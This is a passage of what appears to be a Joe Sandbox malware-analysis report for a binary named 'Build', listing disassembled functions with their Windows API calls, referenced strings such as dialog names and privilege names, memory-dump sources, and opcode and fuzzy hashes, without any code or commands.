                                                                                          • Instruction Fuzzy Hash: 5C110832254600BFD7339F68DC08F663B6DFB4AB02F048018F649EB5A9C765B901CBA5
                                                                                          APIs
                                                                                          • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0036CAA0,00000008,00000004,0036F1F0,?,00000000), ref: 00372F61
                                                                                          • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0036CAA0,00000008,00000004,0036F1F0,?,00000000), ref: 00372F6B
                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0036CAA0,00000008,00000004,0036F1F0,?,00000000), ref: 00372F7B
                                                                                          Strings
                                                                                          • Thread pool initialization failed., xrefs: 00372F93
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                          • String ID: Thread pool initialization failed.
                                                                                          • API String ID: 3340455307-2182114853
                                                                                          • Opcode ID: f39ab2ea52c0aba829a482c49954386b98db17e7ee42b0561287793a4e7aad5a
                                                                                          • Instruction ID: 53fadb1b23aed2950c2478dd7650b8d1daff7a925eb4182f57323c36dcec53d3
                                                                                          • Opcode Fuzzy Hash: f39ab2ea52c0aba829a482c49954386b98db17e7ee42b0561287793a4e7aad5a
                                                                                          • Instruction Fuzzy Hash: 441191B1609708AFC3325F6A9CC4AA7FBECEB95744F51882EF1DAC7200D6B559408B60
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                          • API String ID: 0-56093855
                                                                                          • Opcode ID: e2019b2c5a6c91e5d43bc51f7348c9d5792eb4c4967b800a13dcd8763684d53c
                                                                                          • Instruction ID: 5cff3cb91f015abda6370a12720271b194a10d05c32073b8b5bd3e13cb4a4425
                                                                                          • Opcode Fuzzy Hash: e2019b2c5a6c91e5d43bc51f7348c9d5792eb4c4967b800a13dcd8763684d53c
                                                                                          • Instruction Fuzzy Hash: 2601BC39608204AFDB57AF25EC48EA73BACFB4A7A4F004465F905D3270D7719854DBA0
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 00364B42
                                                                                            • Part of subcall function 0038106D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00381079
                                                                                            • Part of subcall function 0038106D: ___delayLoadHelper2@8.DELAYIMP ref: 0038109F
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 00364B4D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
                                                                                          • String ID: string too long$vector too long
                                                                                          • API String ID: 2355824318-1617939282
                                                                                          • Opcode ID: 656b631b325ecdedd6cd7fc81dfe2e248e2d3434c49000d56aeafa15ccecf8fa
                                                                                          • Instruction ID: 985465bde8a7fc768890b64d9245a027ee89c105f51c502d67eb9e01dbddd09d
                                                                                          • Opcode Fuzzy Hash: 656b631b325ecdedd6cd7fc81dfe2e248e2d3434c49000d56aeafa15ccecf8fa
                                                                                          • Instruction Fuzzy Hash: 72F0A0713103086B8A36AF59DC46C4AB3EDEF85B60B10491AFA85C7605C3B0E94487B1
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,00369343,?,?,?), ref: 0036C1EE
                                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,?,00369343,?,?), ref: 0036C22C
                                                                                          • SetFileTime.KERNEL32(00000800,?,?,00000000,?,?,?,00369343,?,?,?,?,?,?,?,?), ref: 0036C2AF
                                                                                          • CloseHandle.KERNEL32(00000800,?,?,?,00369343,?,?,?,?,?,?,?,?,?,?), ref: 0036C2B6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Create$CloseHandleTime
                                                                                          • String ID:
                                                                                          • API String ID: 2287278272-0
                                                                                          • Opcode ID: 6604bce305d16f966627f4fb4608d1663c48c798f4bbb192d6ecafa93f959b6f
                                                                                          • Instruction ID: 93fdf67b5eecdb60adb33c9213616bf62b4458047b876850de054d47932c0373
                                                                                          • Opcode Fuzzy Hash: 6604bce305d16f966627f4fb4608d1663c48c798f4bbb192d6ecafa93f959b6f
                                                                                          • Instruction Fuzzy Hash: CE41F1302583819EE722DB64DC65BBBB7E8AF8A700F04481DB4D6D7181C664EA488752
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 0036BD93
                                                                                          • _wcslen.LIBCMT ref: 0036BDB6
                                                                                          • _wcslen.LIBCMT ref: 0036BE4C
                                                                                          • _wcslen.LIBCMT ref: 0036BEB1
                                                                                            • Part of subcall function 0036C37A: FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,003687BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0036C3A5
                                                                                            • Part of subcall function 0036BBFF: RemoveDirectoryW.KERNEL32(00000001,?,00000001,00000000), ref: 0036BC1C
                                                                                            • Part of subcall function 0036BBFF: RemoveDirectoryW.KERNEL32(?,00000001,?,00000800), ref: 0036BC48
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$DirectoryRemove$CloseFind
                                                                                          • String ID:
                                                                                          • API String ID: 973666142-0
                                                                                          • Opcode ID: 4e081ba596df632a2e78dbe6c51ef1d5e44197f66f7c2b73295c8305e066912e
                                                                                          • Instruction ID: 93803f2c18da8dbc86e29443c26949923027fa35a39ca41bdc8862474639c54f
                                                                                          • Opcode Fuzzy Hash: 4e081ba596df632a2e78dbe6c51ef1d5e44197f66f7c2b73295c8305e066912e
                                                                                          • Instruction Fuzzy Hash: 9941F97250439096CB32AF64A8459EBF3ED9F85300F41C81EEA85D7146DB769DC8CBA1
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,00000000,00000800,?,?,92C77967,00000000,?,00000000), ref: 00368596
                                                                                            • Part of subcall function 00368C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 00368CB2
                                                                                            • Part of subcall function 00368C95: GetLastError.KERNEL32 ref: 00368CF6
                                                                                            • Part of subcall function 00368C95: CloseHandle.KERNEL32(?), ref: 00368D05
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CloseCurrentHandleProcess
                                                                                          • String ID: SeRestorePrivilege$SeSecurityPrivilege$T8
                                                                                          • API String ID: 1245819386-4115626634
                                                                                          • Opcode ID: 1ced3d1935e30b9d779198f5a46513b20974699615e0cf5013b7c68bf4f3c54a
                                                                                          • Instruction ID: f6cd6935b9e650077d5f71fe3c1859f0a333c0d5a72df7a3b49900e6c3bf1e62
                                                                                          • Opcode Fuzzy Hash: 1ced3d1935e30b9d779198f5a46513b20974699615e0cf5013b7c68bf4f3c54a
                                                                                          • Instruction Fuzzy Hash: 6041B471A042489FDF23EF549C42BEE77A8EB4E304F044159FA06EB285DB755E448B61
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00386F64,00000000,00000000,00387F99,?,00387F99,?,00000001,00386F64,?,00000001,00387F99,00387F99), ref: 0038F025
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0038F0AE
                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0038F0C0
                                                                                          • __freea.LIBCMT ref: 0038F0C9
                                                                                            • Part of subcall function 0038BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00386A24,?,0000015D,?,?,?,?,00387F00,000000FF,00000000,?,?), ref: 0038BCC0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                          • String ID:
                                                                                          • API String ID: 2652629310-0
                                                                                          • Opcode ID: 6a8c37fe0d4d2933428c14ce2ad807fdf9963b4f0687321c6268630781433271
                                                                                          • Instruction ID: 4bd12a482cdbd32139f51a2c99acc77d7c9076a8e8af17125ba50577e4fe0dbd
                                                                                          • Opcode Fuzzy Hash: 6a8c37fe0d4d2933428c14ce2ad807fdf9963b4f0687321c6268630781433271
                                                                                          • Instruction Fuzzy Hash: D631C0B1A0030A9FDF26AF64DC41DAE7BA9EB40310F1542A9FC04DB192E736DD54CB90
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 0037C5F6
                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0037C605
                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0037C613
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0037C621
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDevice$Release
                                                                                          • String ID:
                                                                                          • API String ID: 1035833867-0
                                                                                          • Opcode ID: 7cfefce14c07a7eecc027de4c5e001d2417cae76fa35efef1b4b07a70f3923a2
                                                                                          • Instruction ID: 70dd561211a494b409ed0e332fe0a29dd1de2326210ef5b045110e2b53669a21
                                                                                          • Opcode Fuzzy Hash: 7cfefce14c07a7eecc027de4c5e001d2417cae76fa35efef1b4b07a70f3923a2
                                                                                          • Instruction Fuzzy Hash: E5E0EC71999664A7D3231B62AC1DF963B5CEB1A713F095005FE05D6290CA7458008FD4
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen
                                                                                          • String ID: }
                                                                                          • API String ID: 176396367-4239843852
                                                                                          • Opcode ID: ddb5bd8618f3c56b3f004205e312ad60c678131fab5337e9a86fdd51eca518fa
                                                                                          • Instruction ID: 1bf19b166bdad1928da72d34527b6a9912bc8155a6faa580a13bae577368c7e4
                                                                                          • Opcode Fuzzy Hash: ddb5bd8618f3c56b3f004205e312ad60c678131fab5337e9a86fdd51eca518fa
                                                                                          • Instruction Fuzzy Hash: 1B21F1329043496AD733EF64D845A6BB3FCEF85710F41446AF588C7141EA64E84883E3
                                                                                          APIs
                                                                                            • Part of subcall function 0037D392: GetCurrentProcess.KERNEL32(00020008,?), ref: 0037D3A1
                                                                                            • Part of subcall function 0037D392: GetLastError.KERNEL32 ref: 0037D3CC
                                                                                          • CreateDirectoryW.KERNEL32(?,?), ref: 0037CF61
                                                                                          • LocalFree.KERNEL32(?), ref: 0037CF6F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                          • String ID: 8
                                                                                          • API String ID: 1077098981-502372171
                                                                                          • Opcode ID: 83a0359c35018e6746dcf231d9f22aab569915ee9e8a92d91979c5299ed038e9
                                                                                          • Instruction ID: abe7205d77b9ce2f812650850de6150cac93bcb05cb6da701c33b5858b573d2c
                                                                                          • Opcode Fuzzy Hash: 83a0359c35018e6746dcf231d9f22aab569915ee9e8a92d91979c5299ed038e9
                                                                                          • Instruction Fuzzy Hash: A221D6B1900209ABDB11DFA5D9859EFBBFCFF45340F50812AF815E2250E735DA15CBA0
                                                                                          APIs
                                                                                          • _swprintf.LIBCMT ref: 0036D8D3
                                                                                            • Part of subcall function 00364C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00364C13
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: __vswprintf_c_l_swprintf
                                                                                          • String ID: %c:\
                                                                                          • API String ID: 1543624204-3142399695
                                                                                          • Opcode ID: 38e73c9e905ca9147f99f7374e1fed4b54c6cac0a33e35c7685abfd877abcc17
                                                                                          • Instruction ID: 3cdcbecbac7e7fed318e8494834dc8c093881c93590b543b206032ca425cf631
                                                                                          • Opcode Fuzzy Hash: 38e73c9e905ca9147f99f7374e1fed4b54c6cac0a33e35c7685abfd877abcc17
                                                                                          • Instruction Fuzzy Hash: 9101F563A0431179DB237B759C46D6BA7ECDED5760742C41AF444CA586FB21D840C3A1
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0038130A
                                                                                          • ___raise_securityfailure.LIBCMT ref: 003813F2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                          • String ID: 8]<
                                                                                          • API String ID: 3761405300-4114821796
                                                                                          • Opcode ID: 775b46cbb51f73790103fc6d2fa183c8b2b49e7b92da1bb002ec28f9921de05a
                                                                                          • Instruction ID: ce617febc15f333a932e1e281d1228dfb943a33de265c40b6abd32ca7a11cbb2
                                                                                          • Opcode Fuzzy Hash: 775b46cbb51f73790103fc6d2fa183c8b2b49e7b92da1bb002ec28f9921de05a
                                                                                          • Instruction Fuzzy Hash: FB21EEB5510B009BD712DF29E88AA857BACBB59315F50502AE909CA6A1E3B1BAC18B44
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00020008,?), ref: 0037D3A1
                                                                                          • GetLastError.KERNEL32 ref: 0037D3CC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentErrorLastProcess
                                                                                          • String ID: @8
                                                                                          • API String ID: 335030130-1981503237
                                                                                          • Opcode ID: bd2a9c4722a3cb76cb388dbf319ae3ec74c40e172e1277dfb4906303e495ffe1
                                                                                          • Instruction ID: d612b913d25ae34687f6cf2da4d821de40028bcbb8d2ce802d77e0792f1f89a7
                                                                                          • Opcode Fuzzy Hash: bd2a9c4722a3cb76cb388dbf319ae3ec74c40e172e1277dfb4906303e495ffe1
                                                                                          • Instruction Fuzzy Hash: 75016D75500218FFDB235FA2EC8AEEE7B7DEF04350F104065F905E1150EA76AE40AB20
                                                                                          APIs
                                                                                            • Part of subcall function 0038B9A5: GetLastError.KERNEL32(?,003A50C4,00386E12,003A50C4,?,?,0038688D,?,?,003A50C4), ref: 0038B9A9
                                                                                            • Part of subcall function 0038B9A5: _free.LIBCMT ref: 0038B9DC
                                                                                            • Part of subcall function 0038B9A5: SetLastError.KERNEL32(00000000,?,003A50C4), ref: 0038BA1D
                                                                                            • Part of subcall function 0038B9A5: _abort.LIBCMT ref: 0038BA23
                                                                                          • _abort.LIBCMT ref: 0038E1D0
                                                                                          • _free.LIBCMT ref: 0038E204
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast_abort_free
                                                                                          • String ID: p,:
                                                                                          • API String ID: 289325740-1418527582
                                                                                          • Opcode ID: 688102bf24086eaab1bc7d1094754b9ea8d0dd68d778e99aa297fa8423036304
                                                                                          • Instruction ID: 9d43bb9392d39519a82c052beb27fdf49cd8d712848275ff05ae9d7c95eb1ffd
                                                                                          • Opcode Fuzzy Hash: 688102bf24086eaab1bc7d1094754b9ea8d0dd68d778e99aa297fa8423036304
                                                                                          • Instruction Fuzzy Hash: B4018071D01726DBCB23BF6DC80165EF368BF09B21B16069AE8646B680CB706D428FC1
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00381410
